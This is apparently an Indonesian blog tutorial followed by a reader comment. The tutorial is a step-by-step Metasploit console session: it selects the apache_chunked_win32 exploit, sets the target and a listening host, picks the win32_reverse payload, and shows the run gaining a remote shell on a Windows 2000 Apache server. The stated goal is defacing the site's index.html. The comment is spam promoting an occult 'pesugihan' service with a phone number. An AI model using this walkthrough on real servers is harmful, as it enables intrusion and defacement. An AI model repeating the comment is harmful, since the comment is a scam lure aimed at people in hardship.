- Setelah agak lama masuk juga di msfconsole, kemudian ketik show exploits
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
Jadi
disini kita bisa melihat daftar exploit pada Metasploit. salah satu
yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni:
apache_chunked_win32
- Lanjut dengan pake salah satu exploit diatas
msf > use apache_chunked_win32
msf apache_chunked_win32 >
Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:
msf apache_chunked_win32 > show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port
Target: Windows NT/2K Brute Force
msf apache_chunked_win32 >
- Sekarang kita
balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti
remote host IP address target, seperti contoh dibawah ini :
msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >
Disini
kita dapat melihat berbagai opsi yang kita perlukan sebelum
menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam
kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi
payloads bisa digunakan?
msf apache_chunked_win32 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
msf apache_chunked_win32 >
Opsi
ini merupakan bagian dari Metasploit Framework, yang memungkinkan
anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun
payload yang akan anda eksekusi pada komputer korban. Pilihan ini
merupakan hal umum dalam penggunaan security tool.
Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload.
Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk
mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file
index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan
shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita
perlu memberitahu Framework tersebut bahwa kita ingin opsi payload
tersebut. Berikut ini syntax-nya:
msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >
Jadi
kita sekarang telah menentukan payload dan telah menjadi prompt
dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address
untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah
sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban?
Kita juga perlu melakukan hal yang sama untuk menentukan receiving
host. Silakan lihat perintahnya dibawah ini:
msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >
- Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:
msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
Starting Reverse Handler.
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
Got connection from 192.168.1.101:1031
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache>
- Nah Kita sudah Masuk tuh Ke shell webservernya target........
kita mau apain aja terserah.....
Gunakan Pelajaran ini untuk kebaikan,,,,bukan untuk keisengan,kebencian ataupun kesenangan,,,,!!!
Assalamualaikum wrb,saya Rahman saputrah, niat saya hanya ingin berbagi kebaikan khusus kepada orang yang mengalami kesusahan,percaya tidak percaya semua kembali pada pembaca postingan saya, awalnya saya seorang pengusaha yang bisa dibilang sukses, tapi banyak yang tidak suka kalau saya sukses,dan akhirnya bisnis saya bangkrut dan saya sempat jadi Pengangguran kurang lebih 1tahun saya punya anak 3 dan masih kecil2,saya sempat putus asa dan tidak tau mau berbuat apa, tapi setiap saya melihat anak saya, Saya merasa kasian, dan kemarin tampa disengaja ada Teman saya memberi saran dia menyarangkan saya untuk menghubungi Mbah jonoseuh, beliau memberikan bantuan Pesugihan, awalnya sih saya ragu tapi mau nggak mau saya beranikan diri mencoba bantuan dari Mbah jonoseuh. syukur Alhamdulillah dengan bantuan pesugihan beliau saya sekarang sukses kembali dan saya bisa biayai sekolah anak saya sampai selesai,terimah kasih Mbah berkat Mbah saya bisa sukses kembali,ini pengalaman pribadi saya khusus bagi teman2 yang sempat baca dan punya masalah silahkan hub Mbah jonoseuh di nomor 082344445588 dan pasti beliau bisa meringankan semuah permasalahan yang anda hadapi untuk saat ini, Dan terimah kasih kepada yang punya room ini karna saya sempat berbagi pengalaman dan mudah2han bisa membantu,
ReplyDelete